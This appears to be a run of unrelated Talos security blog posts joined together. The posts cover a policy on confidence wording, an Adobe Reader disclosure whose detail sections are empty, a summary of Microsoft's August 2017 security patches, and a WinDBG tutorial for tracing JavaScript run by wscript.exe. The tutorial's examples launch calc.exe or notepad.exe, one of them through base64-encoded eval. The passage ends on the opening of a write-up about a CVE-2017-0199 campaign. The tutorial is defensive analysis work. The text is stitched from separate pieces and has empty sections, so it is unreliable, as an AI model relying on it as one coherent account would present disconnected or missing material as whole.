This post was authored by Matt Olney.

Typically, Talos has the luxury of time when conducting research. We can carefully draft a report that clearly lays out the evidence and leads the reader to a clear understanding of our well supported findings. A great deal of time is spent ensuring that the correct words and logical paths are used so that we are both absolutely clear and absolutely correct.  Frequently, the goal is to inform and educate readers about specific threats or techniques.

There are times, however, when we are documenting our research in something very close to real-time. The recent WannaCry and Nyetya events are excellent examples of this. Our goal changes here, as does our process. Here we are racing the clock to get accurate, impactful, and actionable information to help customers react even while new information is coming in.

In these situations, and in certain other kinds of investigations, it is necessary for us to talk about something when we aren’t 100% certain we are correct.  I’ll provide two examples from our Nyetya blog posts:

Example 1:

“Given the circumstances of this attack, Talos assesses with high confidence that the intent of the actor behind Nyetya was destructive in nature and not economically motivated.”

This is our response to customers who were asking “If I pay will I get my data back?”.   There were a number of indications that made us think that this was unlikely, but we couldn’t necessarily prove that there was no way it could occur at the time we published.  We weren’t certain, but it was important to share our analysis quickly because customers needed information in order to make time-sensitive decisions, so we did so with a clear statement that there was room for error.

Example 2:

“This is a significant loss in operational capability, and the Threat Intelligence and Interdiction team assesses with moderate confidence that it is unlikely that they would have expended this capability without confidence that they now have or can easily obtain similar capability in target networks of highest priority to the threat actor.”

Here we are speaking about an actor’s thought process.  Obviously we aren’t in a position to authoritatively speak about what is going through an actor’s head.  But we can look at a broad set of circumstances, analyze them in the light of our past observations and experiences, and then try to understand what underlying meaning they might have.  Based on what we saw, we thought it important to express that the actor may have additional capability it had not shown, so again, we spoke in plain language that gave the reader information they could evaluate.

Speaking with doubt doesn’t mean guessing.  At Talos it means applying experience and knowledge to a set of information that is incomplete and trying to extract actionable intelligence from that information.  When we document our findings externally, we are under an obligation to be crystal clear if we are engaging in some form of speculation in order to develop a thoughtful assessment based on strong indicators.  This doesn’t make the information less valuable, but it does allow the reader to correctly weigh the information when prioritizing their own response.  As we move ahead, when Talos communicates doubt, we will do so using the following as guidance:

Phrase	Estimated % Confidence
Low Confidence / Possible / Unlikely	<35%
Moderate Confidence / Probable / Likely	35% - 69%
High Confidence / Highly Probable / Highly Likely	>70%

Our primary mission is to place into our reader’s hands the information they need to defend their systems and their networks.  We can’t always wait until we are 100% certain of findings, particularly while we are in the midst of an incident.  By utilizing this language, we can share findings earlier and give customers the ability to evaluate our information and apply it to their defenses if necessary.

Parser vulnerabilities in common software packages such as Adobe Acrobat Reader pose a significant security risk to large portions of the internet. The fact that these software packages typically have a large footprints often gives attackers a broad attack surface they can potentially leverage for malicious purposes. Thus, identifying vulnerabilities and responsibly disclosing them is critical to eliminating attack vectors that may otherwise be exploited.

Today, Talos is disclosing a vulnerability that has been identified in Adobe Acrobat Reader DC. The vulnerability, if exploited, could lead to arbitrary code execution on affected devices. As part of the coordinated effort to responsibly disclose the vulnerability, Adobe has released a software update that addresses the vulnerability. Additionally, Talos has developed Snort rules that detect attempts to exploit the flaw.

Vulnerability Details

Coverage

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 48 new vulnerabilities with 25 of them rated critical, 21 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Remote Desktop Protocol, Sharepoint, SQL Server, the Windows Subsystem for Linux, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.

Vulnerabilities Rated Critical

The following vulnerabilities are rated "critical" by Microsoft:

• CVE-2017-8653 - Microsoft Browser Memory Corruption Vulnerability
• CVE-2017-8669 - Microsoft Browser Memory Corruption Vulnerability
• CVE-2017-8661 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-0250 - Microsoft JET Database Engine Remote Code Execution Vulnerability
• CVE-2017-8634 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8635 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8636 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8638 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8639 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8640 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8641 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8645 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8646 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8647 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8655 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8656 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8657 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8670 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8671 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8672 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8674 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8591 - Windows IME Remote Code Execution Vulnerability
• CVE-2017-0293 - Windows PDF Remote Code Execution Vulnerability
• CVE-2017-8620 - Windows Search Remote Code Execution Vulnerability
• CVE-2017-8622 - Windows Subsystem for Linux Elevation of Privilege Vulnerability

The following briefly describes these vulnerabilities.

Multiple CVEs - Scripting Engine Memory Corruption Vulnerability

Multiple vulnerabilities have been identified in the Microsoft Browser JavaScript engine that could allow remote code execution to occur in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory, resulting in memory corruption. Exploitation of these vulnerabilities is achievable if a user visits a specifically crafted web page that contains JavaScript designed to exploit one or more of these vulnerabilities.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8634
• CVE-2017-8635
• CVE-2017-8636
• CVE-2017-8638
• CVE-2017-8639
• CVE-2017-8640
• CVE-2017-8641
• CVE-2017-8645
• CVE-2017-8646
• CVE-2017-8647
• CVE-2017-8655
• CVE-2017-8656
• CVE-2017-8657
• CVE-2017-8670
• CVE-2017-8671
• CVE-2017-8672
• CVE-2017-8674

CVE-2017-8653, CVE-2017-8669 - Microsoft Browser Memory Corruption Vulnerabilities

Two vulnerabilities have been identified in Edge and Internet Explorer that could result in remote code execution in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory when attempting to render a webpage. Both vulnerabilities could be exploited if, for example, a user visits a specifically crafted webpage that exploits one of the flaws.

CVE-2017-8661 - Microsoft Edge Memory Corruption Vulnerability

A vulnerability in Microsoft Edge has been identified that could allow an attacker to execute arbitrary code on a targeted host. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-0250 - Microsoft JET Database Engine Remote Code Execution Vulnerability

A buffer overflow vulnerability in the Microsoft JET Database Engine has been identified that could allow an attacker to execute arbitrary code in the context of the current user. This vulnerability can be triggered by opening or previewing a specifically crafted database file on a vulnerable system. Scenarios where this could occur could be an email-based attack where an attacker sends the targeted user a malicious database file to be opened.

CVE-2017-8591 - Windows IME Remote Code Execution Vulnerability

An arbitrary code execution vulnerability in the Windows Input Method Editor (IME) has been identified that could allow an attacker to execute code in the context of the current user. The vulnerability manifests due to improper handling of parameters in a method of a DCOM class. Note that DCOM server is a component of Microsoft Windows that is installed regardless of the language/IMEs used. An attacker who exploits this vulnerability can instantiate the DCOM class and exploit the system, even if IME is disabled.

CVE-2017-0293 - Windows PDF Remote Code Execution Vulnerability

A vulnerability in Windows PDF has been identified that could allow an attacker to execute arbitrary code on a targeted host. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. Users who open a specifically crafted PDF file or who visit a web page containing a specifically crafted PDF could exploit this vulnerability.

CVE-2017-8620 - Windows Search Remote Code Execution Vulnerability

A vulnerability in Windows Search has been identified that could allow an attacker to remotely execute arbitrary code on a targeted host. This vulnerability manifests due to improper handling of objects in memory. Upon successful exploitation, an attacker with physical access to the affected host could elevate privileges to that of an administrator. This vulnerability could also be exploited in an enterprise environment via an SMB connection to the affected host.

CVE-2017-8622 - Windows Subsystem for Linux Elevation of Privilege Vulnerability

A vulnerability in the Windows System for Linux has been identified that could be used escalate a user's privileges to that of an administrator. This vulnerability manifests due to how the Windows Subsystem for Linux handles NT pipes. Successful exploitation could allow a local, authenticated attacker to execute code as an administrator.

Vulnerabilities Rated Important

The following vulnerabilities are rated "important" by Microsoft:

• CVE-2017-8691 - Express Compressed Fonts Remote Code Execution Vulnerability
• CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability
• CVE-2017-8503 - Microsoft Edge Elevation of Privilege Vulnerability
• CVE-2017-8642 - Microsoft Edge Elevation of Privilege Vulnerability
• CVE-2017-8644 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8652 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8662 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8654 - Microsoft Office SharePoint XSS Vulnerability
• CVE-2017-8516 - Microsoft SQL Server Analysis Services Information Disclosure Vulnerability
• CVE-2017-8659 - Scripting Engine Information Disclosure Vulnerability
• CVE-2017-8637 - Scripting Engine Security Feature Bypass Vulnerability
• CVE-2017-8668 - Volume Manager Extension Driver Information Disclosure Vulnerability
• CVE-2017-8593 - Win32k Elevation of Privilege Vulnerability
• CVE-2017-8666 - Win32k Information Disclosure Vulnerability
• CVE-2017-8624 - Windows CLFS Elevation of Privilege Vulnerability
• CVE-2017-8633 - Windows Error Reporting Elevation of Privilege Vulnerability
• CVE-2017-8623 - Windows Hyper-V Denial of Service Vulnerability
• CVE-2017-8664 - Windows Hyper-V Remote Code Execution Vulnerability
• CVE-2017-0174 - Windows NetBIOS Denial of Service Vulnerability
• CVE-2017-8673 - Windows Remote Desktop Protocol Denial of Service Vulnerability
• CVE-2017-8627 - Windows Subsystem for Linux Denial of Service Vulnerability

The following briefly describes these vulnerabilities.

CVE-2017-8644, CVE-2017-8652, CVE-2017-8662 - Microsoft Edge Information Disclosure Vulnerability

Multiple vulnerabilities in Microsoft Edge have been identified that could allow an attacker to discover sensitive information regarding the targeted system. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities could given an attacker the necessary information to further exploit additional vulnerabilities on the system.

CVE-2017-8503 - Microsoft Edge Elevation of Privilege Vulnerability

A vulnerability in Microsoft Edge has been identified that could result in privilege escalation if exploited. This vulnerability manifests as an AppContainter sandbox escape within the browser. Successful exploitation could result in a user obtaining elevated privileges. Note that this vulnerability does not allow arbitrary code execution. However, if used in conjunction with one more vulnerabilities, an attacker could execute arbitrary code in the context of an administrator.

CVE-2017-8642 - Microsoft Edge Elevation of Privilege Vulnerability

A vulnerability in Microsoft Edge has been identified that could result in privilege escalation if exploited. This vulnerability manifests due to improper validation of JavaScript in certain circumstances. Successful exploitation could elevate privileges in affected versions of Microsoft Edge. Note that this vulnerability does not permit arbitrary code execution. However, if used in conjunction with one, an attacker could execute arbitrary code with medium-level integrity, or that of the current user. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability

A vulnerability in Internet Explorer has been identified that could be exploited to bypass a security feature. This vulnerability manifests due to Internet Explorer improperly validating User Mode Code Integrity (UMCI) policies. Successful exploitation of this vulnerability could allow an attacker to execute unsigned malicious code as if it were signed. Exploiting this vulnerability is possible if a user visits a specifically crafted website designed to exploit the flaw.

CVE-2017-8691 - Express Compressed Fonts Remote Code Execution Vulnerability

A vulnerability in the Windows Font library has been identified that could permit an attacker to execute arbitrary code in the context of the current user. This vulnerability manifests due to the library improperly handling specially crafted embedded fonts. Exploitation of this vulnerability is possible if a user visits a specifically crafted web page or if a user opens a specifically crafted file that is designed to exploit this vulnerability.

CVE-2017-8654 - Microsoft Office SharePoint XSS Vulnerability

A vulnerability in Microsoft Sharepoint has been identified that could could allow an attacker to execute a cross-site scripting (XSS) attack. This vulnerability manifests due to Sharepoint Server improperly sanitizing specific web requests from a user. Successful exploitation of this vulnerability could allow an attacker to execute script in the context of the current user, read content that the attacker would not have permission to otherwise view, or execute actions on behalf of the affected user.

CVE-2017-8516 - Microsoft SQL Server Analysis Services Information Disclosure Vulnerability

A vulnerability in Microsoft SQL Server Analysis Services has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to SQL Server Analysis Services improperly enforcing permissions. An attacker with valid credentials that permit access to the affected SQL Server could exploit this vulnerability to gain additional database and file information that should otherwise not be permitted.

CVE-2017-8659 - Scripting Engine Information Disclosure Vulnerability

A vulnerability in the Chakra JavaScript Engine has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining information that could then be used to further exploit the system. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-8637 - Scripting Engine Security Feature Bypass Vulnerability

A vulnerability in the Microsoft Edge has been identified that could allow an attacker to bypass a security feature. This vulnerability manifests due to way memory is accessed in "code compiled by the Edge Just-In-Time (JIT) compiler that allows Arbitrary Code Guard (ACG) to be bypassed". Note that this exploiting this vulnerability does not result in arbitrary code execution. However, if used in combination with another vulnerability, an attacker could execute arbitrary code on the targeted system. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-8668 - Volume Manager Extension Driver Information Disclosure Vulnerability

A vulnerability in the Volume Manager Extension Driver has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to the Volume Manager Extension Driver improperly providing kernel information. Successful exploitation could allow an attacker to gain information that could be used to further compromise a targeted system.

CVE-2017-8593 - Win32k Elevation of Privilege Vulnerability

A vulnerability in the Win32k component in Windows has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specifically crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.

CVE-2017-8666 - Win32k Information Disclosure Vulnerability

A vulnerability in the Win32k component in Windows has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to the Win32k component improperly providing kernel information. Successful exploitation could allow an attacker to gain information that could be used to further compromise a targeted system.

CVE-2017-8624 - Windows CLFS Elevation of Privilege Vulnerability

A vulnerability in the Windows Common Log File System (CLFS) driver has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specifically crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.

CVE-2017-8633 - Windows Error Reporting Elevation of Privilege Vulnerability

A vulnerability in the Windows Error Reporting (WER) has been identified that could allow a privilege escalation attack to occur. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system.

CVE-2017-8623 - Windows Hyper-V Denial of Service Vulnerability

A vulnerability in the Microsoft Hyper-V Network Switch has been identified that could allow a denial of service attack to occur. This vulnerability manifests due to improper validation of input "from a privileged user on a guest operating system." Successful exploitation of this vulnerability could cause the host server to crash. Exploiting this flaw requires that a privileged user on the guest host runs a specifically crafted executable that exploits this vulnerability, thus causing the host system to crash.

CVE-2017-8664 - Windows Hyper-V Remote Code Execution Vulnerability

A vulnerability in Windows Hyper-V has been identified that could allow arbitrary code execution on the hypervisor system to occur. This vulnerability manifests due to improperly validating "input from an authenticated user on a guest operating system." Exploitation of the vulnerability could be achieved if an attackers runs a specifically crafted application within a guest operating system that causes Hyper-V to execute arbitrary code.

CVE-2017-0174 - Windows NetBIOS Denial of Service Vulnerability

A vulnerability in the Microsoft Windows has been identified that could allow a denial of service attack to occur. This vulnerability manifests due to Windows improperly handling NetBIOS packets. Successful exploitation of this vulnerability could cause the host to become unresponsive. An attacker who sends a series of specifically crafted TCP packets to the targeted system could create a permanent denial of service condition.

CVE-2017-8673 - Windows Remote Desktop Protocol Denial of Service Vulnerability

A vulnerability in Remote Desktop Protocol (RDP) has been identified that could allow a denial of service attack to occur. This vulnerability manifests due to target system improperly handling RDP requests once an attacker has connected to the targeted system. Successful exploitation of this vulnerability could cause the RDP service to become unresponsive.

CVE-2017-8627 - Windows Subsystem for Linux Denial of Service Vulnerability

A vulnerability in the Windows Subsystem for Linux has been identified that could allow a denial of service attack to occur. This vulnerability manifests due to the Subsystem improperly handling objects in memory. Successful exploitation of this vulnerability could cause the local system to become unresponsive.

Vulnerabilities Rated Moderate

The following vulnerabilities are rated "moderate" by Microsoft:

• CVE-2017-8650 - Microsoft Edge Security Feature Bypass Vulnerability
• CVE-2017-8651 - Internet Explorer Memory Corruption Vulnerability

The following briefly describes these vulnerabilities.

CVE-2017-8650 - Microsoft Edge Security Feature Bypass Vulnerability

A vulnerability in Microsoft Edge has been identified that allow an attacker to bypass a security feature. This vulnerability manifests due to improperly enforcement of same-origin policies. Successful exploitation could allow an attacker to "access information from origins outside the current one." Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-8651 - Internet Explorer Memory Corruption Vulnerability

A vulnerability in Internet Explorer has been identified that could allow an attacker to execute arbitrary code on a targeted host. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.

Snort Rules:

• 43847-43848
• 43851-43852

This blog was authored by Paul Rascagneres.

Introduction

JavaScript is frequently used by malware authors to execute malicious code on Windows systems because it is powerful, natively available and rarely disabled. Our previous article on .NET analysis generated much interest relating to how to use WinDBG to analyse .js files. In this post we extend our description of using WinDBG to describe the analysis of JavaScript using the 64 bit version of wscript.exe. It is strongly recommended to read our previous article first.

Object Loading on Windows Systems

JavaScript often needs to load external objects, in order to obtain access to additional features not included by default in the Windows interpreter. This can be achieved by using the ActiveXObject() API (to load ActiveX objects) or WScript.CreateObject() API (to load COM objects). The mechanisms behind these 2 API are the same: loading an external library to enable access to new objects. Here are 2 examples:

new ActiveXObject("Shell.Application");
WScript.CreateObject("Wscript.Shell");

The first point is to understand which library is behind these two objects. This information is stored in the registry. First we need to get the CLSID associated to the object name in the following registry name: HKEY_CLASSES_ROOT\OBJECT_NAME\CLSID.

Here is an example for the Shell.Application object name:
This shows that the CLSID is {13709620-C279-11CE-A49E-444553540000}. With this information we are able to get the dll path of the object in HKEY_CLASSES_ROOT\CLSID\{THE_CLSID}:
In this case, the library in which the Shell.Application object is located is shell32.dll. With this information, we are able to start WinDBG in order to analyse object loading and execution.

WinDBG Analysis

The analysis of JavaScript execution is performed by debugging the wscript.exe binary. This can be executed with the following command:

"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe" C:\Windows\System32\wscript.exe c:\Users\User\to_be_analysed.js

The technique is often the same:

• Breakpoint when the object library is loaded;
• Identification and breakpoint on the wanted function;
• Get arguments of the function

Case Study #1: ActiveX Object

Consider the following code:

var oShell = new ActiveXObject("Shell.Application");
var commandtoRun = "calc.exe";
oShell.ShellExecute(commandtoRun,"","","","1");

The first task is to find where the "Shell.Application" library object is located in the registry:

c:\Users\user> script.py Shell.Application
Object Name: Shell.Application
CLSID: {13709620-C279-11CE-A49E-444553540000}
Description: Shell Automation Service
dll: %SystemRoot%\system32\shell32.dll

This tells us that we should analyse shell32.dll. Let's execute this script and introduce a breakpoint when the library is loaded:

0:000> sxe ld shell32 ; g
ModLoad: 00007fff`c6af0000 00007fff`c7f27000   C:\WINDOWS\System32\SHELL32.dll
ntdll!NtMapViewOfSection+0x14:
00007fff`c8e658a4 c3              ret
The next step is to identify the ShellExecute function:
0:000> x shell32!ShellExecute

Unfortunately, the function does not have the same name in JavaScript and in the library. However, we can search for it using a regular expression:

0:000> x shell32!ShellExecute*
00007fff`c6b13dd0 SHELL32!ShellExecuteExW (void)
00007fff`c6b13e44 SHELL32!ShellExecuteNormal (void)
00007fff`c6cb1630 SHELL32!ShellExecuteExA (<no parameter info>)
00007fff`c6fa8d58 SHELL32!ShellExecuteRegApp (<no parameter info>)
00007fff`c6bef560 SHELL32!ShellExecuteW (<no parameter info>)
00007fff`c6cb15a0 SHELL32!ShellExecuteA (<no parameter info>)
00007fff`c6fa9058 SHELL32!ShellExecuteRunApp (<no parameter info>)

In our case, we can add a breakpoint for ShellExecuteNormal:

0:000> bp shell32!ShellExecuteNormal
0:000> g
Breakpoint 0 hit
SHELL32!ShellExecuteNormal:
00007fff`c6b13e44 48895c2408      mov     qword ptr [rsp+8],rbx ss:00000029`cb56c7a0=00000029cb56cc90

We can now retrieve the argument directly via the RCX register:

0:000> r $t1=poi(rcx+0x18);du $t1
000001ee`350d055c  "calc.exe"

At first glance, it's not obvious why there is an offset of 0x18. This is due to the argument being passed to ShellExecuteNormal() is a pointer to a SHELLEXECUTEINFO structure. The Microsoft documentation describes than in these cases, the structure is located with the offset 0x18.

Case Study #2: WScript Shell Object

Let's consider a second example:

var shell = WScript.CreateObject("Wscript.Shell");
var command = "calc.exe"; 
shell.Run(command, true, false);

As previously, the first task consists of finding the library where Wscript.Shell is located:

c:\Users\user> script.py Wscript.Shell
Object Name: Wscript.Shell
CLSID: {72C24DD5-D70A-438B-8A42-98424B88AFB8}
Description: Windows Script Host Shell Object
dll: C:\Windows\System32\wshom.ocx

Let's try to identify the function name:

0:000> sxe ld wshom
0:000> g
ModLoad: 00007fff`b5630000 00007fff`b5657000   C:\Windows\System32\wshom.ocx
ntdll!NtMapViewOfSection+0x14:
00007fff`c8e658a4 c3              ret
0:000> x wshom!*Run*
00007fff`b5640930 wshom!CUnknown::InnerUnknown::`vftable' = <no type information>
00007fff`b563d530 wshom!CUnknown::InnerUnknown::QueryInterface (<no parameter info>)
00007fff`b5648084 wshom!_IMPORT_DESCRIPTOR_ScrRun = <no type information>
00007fff`b563d570 wshom!CUnknown::InnerUnknown::Release (<no parameter info>)
00007fff`b5643d30 wshom!ScrRun_NULL_THUNK_DATA = <no type information>
00007fff`b563bbb0 wshom!CWshShell::Run (<no parameter info>)
00007fff`b5631000 wshom!CUnknown::InnerUnknown::AddRef (<no parameter info>)
00007fff`b5644518 wshom!LIBID_IWshRuntimeLibrary = <no type information>)

The function is wshom!CWshShell::Run, we can breakpoint on this and check for the argument:

0:000> bp wshom!CWshShell::Run
0:000> g
Breakpoint 0 hit
wshom!CWshShell::Run:
00007fff`b563bbb0 48895c2408      mov     qword ptr [rsp+8],rbx ss:00000020`7ccfd520=0000013f3d650420
0:000> du rdx
0000013f`3d65055c  "calc.exe"

In contrary to the previous case study, the argument is directly a string and not a structure, therefore there is no offset required to retrieve the argument

Case Study #3: WScript XMLHTTP Object

Here is the source code for this case study:

var httpStream = WScript.CreateObject("MSXML2.XMLHTTP");
httpStream.open("GET", 'http://blog.talosintelligence.com');
httpStream.send();

The library associated with the MSXML2.XMLHTTP object:

c:\Users\user> script.py MSXML2.XMLHTTP
Object Name: MSXML2.XMLHTTP
CLSID: {F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Description: XML HTTP
dll: %SystemRoot%\System32\msxml3.dll

We can use the same technique as before:

0:000> sxe ld msxml3
0:000> g
ModLoad: 00007fff`8dc40000 00007fff`8de68000   C:\WINDOWS\System32\msxml3.dll
ntdll!NtMapViewOfSection+0x14:
00007fff`c8e658a4 c3              ret

This time, we use a regular expression to breakpoint on all the APIs that contain the word "Open":

0:000> bm msxml3!*Open*
1: 00007fff`8dc43030 @!"msxml3!ErrorHelper::CHTMLWindow2::open"
breakpoint 1 redefined
1: 00007fff`8dc43030 @!"msxml3!FakeHTMLDoc::open"
2: 00007fff`8dd4c5fc @!"msxml3!HTTPStream::OpenRequest"
3: 00007fff`8dcaa407 @!"msxml3!_imp_load_CertOpenStore"
breakpoint 1 redefined
1: 00007fff`8dc43030 @!"msxml3!ErrorHelper::CHTMLWindow2::get_opener"
4: 00007fff`8dc48eb4 @!"msxml3!ContentModel::openGroup"
5: 00007fff`8dd4cb00 @!"msxml3!HTTPStream::deferedOpen"
breakpoint 1 redefined
1: 00007fff`8dc43030 @!"msxml3!ErrorHelper::CHTMLDocument2::open"
breakpoint 1 redefined
1: 00007fff`8dc43030 @!"msxml3!ErrorHelper::CHTMLWindow2::put_opener"
6: 00007fff`8dd4a050 @!"msxml3!URLMONRequest::open"
7: 00007fff`8dc8f4d0 @!"msxml3!FileStream::deferedOpen"
8: 00007fff`8dd34e80 @!"msxml3!XMLHttp::open"
9: 00007fff`8dc597e0 @!"msxml3!URLMONStream::deferedOpen"
10: 00007fff`8dc70ddc @!"msxml3!NamespaceMgr::popEntry"
11: 00007fff`8dcaa3bf @!"msxml3!_imp_load_WinHttpOpen"
12: 00007fff`8dcaa3e3 @!"msxml3!_imp_load_WinHttpOpenRequest"
13: 00007fff`8dd47340 @!"msxml3!HTTPRequest::open"
14: 00007fff`8dd47660 @!"msxml3!HTTPRequest::openWithCredentials"
15: 00007fff`8dc8f37c @!"msxml3!FileStream::open"
16: 00007fff`8dd4c128 @!"msxml3!URLStream::OpenPreloadResource"
17: 00007fff`8dd4b410 @!"msxml3!URLRequest::open"
0:000> g
Breakpoint 8 hit
msxml3!XMLHttp::open:
00007fff`8dd34e80 488bc4          mov     rax,rsp

We see that the API used is in fact XMLHttp::open() from this we can obtain the argument:

0:000> du rdx
00000173`311a0568  "GET"
0:000> du r8
00000173`311a0578  "http://blog.talosintelligence.co"
00000173`311a05b8  "m"

These arguments are two strings rather than a structure and can be retrieved without offset.

Case Study #4: Eval() Function

The eval() function is frequently used by malware authors to obfuscate code execution. This function is native to JavaScript and does not require an external library. Here is an example of eval() in use:

var test = "var oShell = new ActiveXObject(\"Shell.Application\");var commandtoRun = \"notepad.exe\"; oShell.ShellExecute(commandtoRun,\"\",\"\",\"\",\"1\");"
eval(test) 

var encoded = "dmFyIG9TaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpO3ZhciBjb21tYW5kdG9SdW4gPSAiY2FsYy5leGUiOyBvU2hlbGwuU2hlbGxFeGVjdXRlKGNvbW1hbmR0b1J1biwiIiwiIiwiIiwiMSIpOwo="
eval(Base64.decode(encoded))

This script executes 2 different kind of eval() calls. The first, contains a string to execute directly (calc.exe execution); the second contains a command used to generate the code to execute (notepad.exe execution encoded with base64).

The eval() function itself is located in the script.dll library: bp jscript!JsEval. The function uses the jscript!COleScript::Compile API to generate the JavaScript code executed via eval():

0:000> sxe ld jscript;g
ModLoad: 00007fff`9e650000 00007fff`9e70c000   C:\Windows\System32\jscript.dll
ntdll!NtMapViewOfSection+0x14:
00007fff`c8e658a4 c3              ret
0:000> bp jscript!JsEval
0:000> g
Breakpoint 0 hit
jscript!JsEval:
00007fff`9e681960 488bc4          mov     rax,rsp
0:000> u rip L50
jscript!JsEval:
00007fff`9e681960 488bc4          mov     rax,rsp
00007fff`9e681963 48895810        mov     qword ptr [rax+10h],rbx
00007fff`9e681967 48897018        mov     qword ptr [rax+18h],rsi
00007fff`9e68196b 48897820        mov     qword ptr [rax+20h],rdi
[...redacted…]
00007fff`9e681a81 488364242000    and     qword ptr [rsp+20h],0
00007fff`9e681a87 e80c3cfdff      call    jscript!COleScript::Compile
00007fff`9e681a8c 89455f          mov     dword ptr [rbp+5Fh],eax
00007fff`9e681a8f 8bf8            mov     edi,eax
00007fff`9e681a91 85c0            test    eax,eax
00007fff`9e681a93 7923            jns     jscript!JsEval+0x158 (00007fff`9e681ab8)

We can breakpoint at jscript!COleScript::Compile to obtain both the unencoded string example calling calc.exe, and the decoded version of the base64 encoded call to notepad.exe:

0:000> bp jscript!COleScript::Compile "r $t1 = poi(rdx+0x10);r $t2 = poi($t1+0x8);du $t2;g";g
jscript!COleScript::Compile:
00007fff`9e715698 4053            push    rbx
0:000> g
0000019b`d23f6408  "var oShell = new ActiveXObject(""
0000019b`d23f6448  "Shell.Application");var commandt"
0000019b`d23f6488  "oRun = "calc.exe"; oShell.ShellE"
0000019b`d23f64c8  "xecute(commandtoRun,"","","","1""
0000019b`d23f6508  ");."
80070002 The system cannot find the file specified.
0000019b`d473a1b0  "var oShell = new ActiveXObject(""
0000019b`d473a1f0  "Shell.Application");var commandt"
0000019b`d473a230  "oRun = "notepad.exe"; oShell.She"
0000019b`d473a270  "llExecute(commandtoRun,"","","","
0000019b`d473a2b0  ""1");"
ntdll!NtTerminateProcess+0x14:
00007fff`c8e65924 c3              ret

Conclusion

WinDBG is an extremely powerful tool that can not only help in the analysis of .NET files, but also help understand the execution of JavaScript by wscript.exe. In many cases, WinDBG may be overkill for understanding the functionality of single JavaScript files. However, using WinDBG can provide a different overview of functionality and facilitate the analysis of complex JavaScript.

Appendix

Python script to get the library from an object name

from _winreg import *
import sys

try:
  objectName = sys.argv[1]
except:
  sys.exit(1)

try:
  hReg = ConnectRegistry(None,HKEY_CLASSES_ROOT)
  hCLSIDKey = OpenKey(hReg, objectName+"\CLSID")
  CLSID=QueryValue(hCLSIDKey, "")
  if CLSID:
    hKey = OpenKey(hReg, "CLSID\\"+CLSID)
    description = QueryValue(hKey, "")
    hKey = OpenKey(hReg, "CLSID\\"+CLSID+"\\InProcServer32")
    dll = QueryValueEx(hKey, "")[0]
    print "Object Name: "+objectName
    print "CLSID: "+CLSID
    print "Description: "+description
    print "dll: "+dll
  else:
    print "No CLSID"
except:
  print "Error"
  sys.exit(2)

Introduction

Since public disclosure in April 2017, CVE-2017-0199 has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.

In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, CVE-2012-0158, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.

